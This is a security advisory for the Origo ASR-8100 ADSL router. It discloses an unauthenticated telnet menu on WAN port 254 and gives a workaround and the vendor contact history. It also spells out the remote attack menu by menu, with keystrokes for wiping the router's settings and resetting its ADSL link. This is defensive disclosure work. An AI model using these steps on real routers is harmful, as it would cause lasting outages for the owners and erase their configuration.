Vulnerable device ----------------- Origo ASR-8100 ADSL router Firmware ETHADSL_USB_110502_REL10_S Customer Software Version 110502_REL10_S ADSL Showtime Firmware Version: 3.21 device based on Conexant CX82310-14 chipset Vulnerability: Remote ADSL reset and permanent denial of service attack ----------------------------------------------------------------------- The following device is able to be remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually by an operator. The attack only takes place after the device is reset - which may be some time after it has been performed. PPP authentication information is lost on reset to factory settings, so it is most likely that the device will be unable to establish a WAN link after reset. The ADSL link can also be remotely reset, causing temporary DoS and (if DHCP is used) its IP address to be changed. Attack overview --------------- A telnet-style configuration interface is left open to WAN interface on port 254, without a password being set. This menu system is very easily driven by a remote attacker. A full exploit is given below. Workaround ---------- Forwarding external port 254 to an internal port that is unused prevents access to the configuration interface. With the web configuration interface at http://router-ip/doc/advance.htm click on Configuration: Virtual server Enter a new entry: Public port: 254 Private port: 9876 TCP Host IP address: 127.0.0.1 Click 'Add this setting', then do Configuration: Save Settings/Reboot and click 'Save & Reboot' Exploit details --------------- From any Internet connected host: telnet <router global IP address> 254 Returns a menu: 01/01/99 CONEXANT SYSTEMS, INC. 00:04:10 ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21 You are prompted for a LOGIN PASSWORD> Just press return Brings up MAIN MENU 1. SYSTEM STATUS AND CONFIGURATION 2. ADSL MENU 4. REMOTE LOGON Press 1 - get to SYSTEM STATUS AND CONFIGURATION 1. SYSTEM INFORMATION 2. SYSTEM CONFIGURATION Press 2 - get to SYSTEM CONFIGURATION 1. CHANGE SYSTEM TIME 2. CHANGE SYSTEM DATE 3. CHANGE PASSWORD 4. FACTORY DEFAULT CONFIGURATION Type 1 hh:mm:ss to reset the system time Type 2 dd/mm/yy to reset the system date (Option 3 doesn't seem to work) Type 4: Prompt: This will reset all the configurations and the ADSL modem. Are you sure?(Y/N) Type Y: Message: NVRAM updated This does not reset the ADSL modem, only clears the NVRAM. This takes effect the next time the modem is reset: the admin password is reset to that printed in the documentation, and the ADSL username/password are reset, meaning the connection is down permanently until a human sets them up again. Any other settings (security etc) are also lost. From main menu, type 2 to get to ADSL MENU 1. ADSL PERFORMANCE STATUS 2. 24 HOUR ADSL PERFORMANCE HISTORY 3. 7 DAY ADSL PERFORMANCE HISTORY 4. ADSL ALARM HISTORY 5. ADSL TRANSCEIVER CONFIGURATION MENU 6. ADSL LINK RESET Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)? Type Y. The ADSL link is reset and a new WAN IP address is requested by DHCP (if the ISP uses it). Vendor notification ------------------- UK support for Vendor (support (at) adsltech (dot) com [email concealed]) was notified on 30th August 2003 - entirety of reply message was 'Thanks a lot'. Vendor doesn't advertise an email address so were notified via web form on that date - no response received. To date the vendor has not advertised any patches or new firmware. -- Theo Markettos theo (at) markettos.org (dot) uk [email concealed] Clare Hall, Cambridge theom (at) chiark.greenend.org (dot) uk [email concealed] CB3 9AL, UK http://www.markettos.org.uk/